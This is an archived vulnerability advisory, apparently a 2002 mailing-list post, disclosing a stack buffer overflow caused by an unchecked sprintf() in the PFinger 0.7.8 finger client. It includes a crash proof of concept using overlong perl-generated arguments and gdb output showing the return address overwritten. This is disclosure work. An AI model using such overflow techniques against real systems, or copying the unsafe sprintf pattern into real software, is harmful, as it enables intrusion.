PFinger Buffer Overflow Vulnerability. * Affected version: PFinger v0.7.8 (http://www.xelia.ch/unix/pfinger/) * Overview: Pfinger program has arrangement extent overflow bug. This is that is found in client. It did not confirm whether server side is weak. Similar various kinds bug may exist anyway. :-( * Description: This happens as arrangement "query(size 100)" becomes overflow. Of course, even if use (-l, -d, -t) option, cause same result. Because this uses wrongly sprintf(), is happened. (line:144) === pfinger-0.7.8/src/finger.c ================================= : : int main( int argc, char *argv[] ) { int flag; char *progname; int info = 0; char *hostname; char query[100]; : : sprintf(query, "%s%s\r\n", (info) ? "/W_" : "", argv[optind]); ~~~~~~~~ DoFinger1(hostname, query); optind++; } : : ================================================================ Next, Stack is stored as following. query["xxxxxxxxxxxx...xxxxxx",'\r','\n','\0']; * Proof of concept: [x82@xpl017elz src]$ ./finger `perl -e 'print "x"x0x82'` finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user. Segmentation fault [x82@xpl017elz src]$ ./finger -l `perl -e 'print "x"x0x82'` finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user. Segmentation fault [x82@xpl017elz src]$ ./finger -d `perl -e 'print "x"x0x82'` finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user. Segmentation fault [x82@xpl017elz src]$ ./finger -t `perl -e 'print "x"x0x82'` finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user. Segmentation fault [x82@xpl017elz src]$ gcc -v Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) [x82@xpl017elz src]$ - Debugging - [x82@xpl017elz src]$ gdb -q ./finger (gdb) r -l `perl -e 'print "x"x100'` Starting program: /usr/local/bin/pfinger-0.7.8/src/./finger -l `perl -e 'print " x"x100'` finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user. Program received signal SIGSEGV, Segmentation fault. 0x4005000a in _ufc_foobar () from /lib/libc.so.6 (gdb) r -l `perl -e 'print "x"x101'` Program received signal SIGSEGV, Segmentation fault. 0x40000a0d in syslog_mem () from /lib/ld-linux.so.2 (gdb) r -l `perl -e 'print "x"x102'` Program received signal SIGSEGV, Segmentation fault. 0xa0d78 in ?? () (gdb) (gdb) r -l `perl -e 'print "x"x105'` Starting program: /usr/local/bin/pfinger-0.7.8/src/./finger -l `perl -e 'print " x"x105'` finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user. Program received signal SIGSEGV, Segmentation fault. 0x400a4b53 in strrchr () from /lib/libc.so.6 (gdb) where #0 0x400a4b53 in strrchr () from /lib/libc.so.6 #1 0xbffff564 in ?? () #2 0x78787878 in ?? () Cannot access memory at address 0x78787878. (gdb) P.S: Sorry, my poor english. __ By "dong-houn yoU" (Xpl017Elz), in INetCop(c). E-mail: szoahcat_private Home: http://x82.i21c.net -- Powered by Outblaze
This archive was generated by hypermail 2b30 : Tue Jun 04 2002 - 10:24:33 PDT